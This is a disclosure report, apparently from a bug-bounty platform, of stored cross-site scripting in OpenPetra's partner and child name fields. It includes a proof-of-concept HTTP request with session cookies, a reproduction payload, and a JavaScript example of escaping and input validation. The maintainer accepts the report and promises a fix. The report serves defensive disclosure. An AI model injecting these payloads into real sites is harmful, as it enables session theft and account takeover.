Cross-site Scripting (XSS) - Stored in openpetra/openpetra
Reported on
Oct 29th 2021
Description
Multiple stored XSS in openpetra 2020.10: partner and child name fields accept HTML, and the stored values are later rendered into the page unencoded.
Proof of Concept
// PoC.req
POST /api/serverMSponsorship.asmx/TSponsorshipWebConnector_MaintainChild HTTP/1.1
Host: demo.openpetra.org
Cookie: ASP.NET_SessionId=AEC44A33068E58B5DE583F3E; OpenPetraSessionID=b987029b-104f-45f1-aa29-339a49d0d55a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 287
Origin: https://demo.openpetra.org
Referer: https://demo.openpetra.org/SponsorShip/Children/MaintainChildren
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"APartnerKey":-1,"ASponsorshipStatus":"CHILDREN_HOME","AFirstName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AFamilyName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AGender":null,"ADateOfBirth":"null","AUserId":"","APhoto":"","new_photo":"","ALedgerNumber":"43","AUploadPhoto":false}
Steps to Reproduce
Sponsorship
Go to Sponsorship and choose Add new child.
In the First name and Surname fields, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">
Partner
Go to Partner and choose Add new partner.
In the Title, First name and Family name fields, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">
The XSS triggers when a user goes to Donations, chooses Add new transaction and searches the Donor Key by the partner's name.
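The root cause in both steps is the same: the name fields are stored verbatim and later concatenated into HTML when the search results are rendered, so the stored string is parsed as markup. The following is an added example (not OpenPetra code) that contrasts the vulnerable string-concatenation pattern with an escaped renderer, using the report's own payload as constructed input; the `partner` object shape and the name-field validation rule are assumptions.

```javascript
// Added example, not part of the OpenPetra project.
// The payload is the one from the report above, used here as test input.
const PAYLOAD = '"><iMg SrC="x" oNeRRor="alert(1);">';

// Escape the characters that can change parsing context in element
// content or inside a double-/single-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: stored data concatenated straight into HTML.
// The stored "><img ...> closes the cell and injects an element.
function renderDonorRowUnsafe(partner) {
  return `<tr><td>${partner.FirstName} ${partner.FamilyName}</td></tr>`;
}

// Hardened pattern: every interpolated value is escaped at the point of use,
// so the browser renders the name as text rather than as markup.
function renderDonorRow(partner) {
  return `<tr><td>${escapeHtml(partner.FirstName)} ${escapeHtml(partner.FamilyName)}</td></tr>`;
}

// Defence in depth (assumed policy, not OpenPetra's): a person's name has no
// legitimate use for angle brackets, so the API can reject such input before
// it is stored. Output encoding above remains the primary control.
function isValidNameField(value) {
  return typeof value === 'string' && value.length <= 64 && !/[<>]/.test(value);
}

// Cheap detection helper for the rendered output: a safe row must never
// contain a raw "<" other than the ones from the template itself.
function rowContainsInjectedTag(html) {
  return /<\s*img/i.test(html);
}

// Constructed partner record carrying the report's payload in both fields.
const partner = { FirstName: PAYLOAD, FamilyName: PAYLOAD };
console.log(renderDonorRowUnsafe(partner)); // injected <img> survives
console.log(renderDonorRow(partner));       // payload shown as inert text
```

When a DOM is available, assigning the name to `element.textContent` (or creating the cell with `document.createTextNode`) achieves the same result as `escapeHtml` without hand-rolling an encoder; the function above exists so the behaviour can be checked outside a browser.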
Impact
This vulnerability could be used to steal a logged-in user's session cookie and gain unauthorized access to that user's account with the stolen cookie.
References
SECURITY.md
I don't see it as a high risk, because you need to be a registered user to be able to add sponsored children. But I see the problem in general, that we have to validate all input coming from the web. I will file a ticket at GitHub for the OpenPetra project, and I will fix it for the next release. Thank you for taking the time and reporting the issue!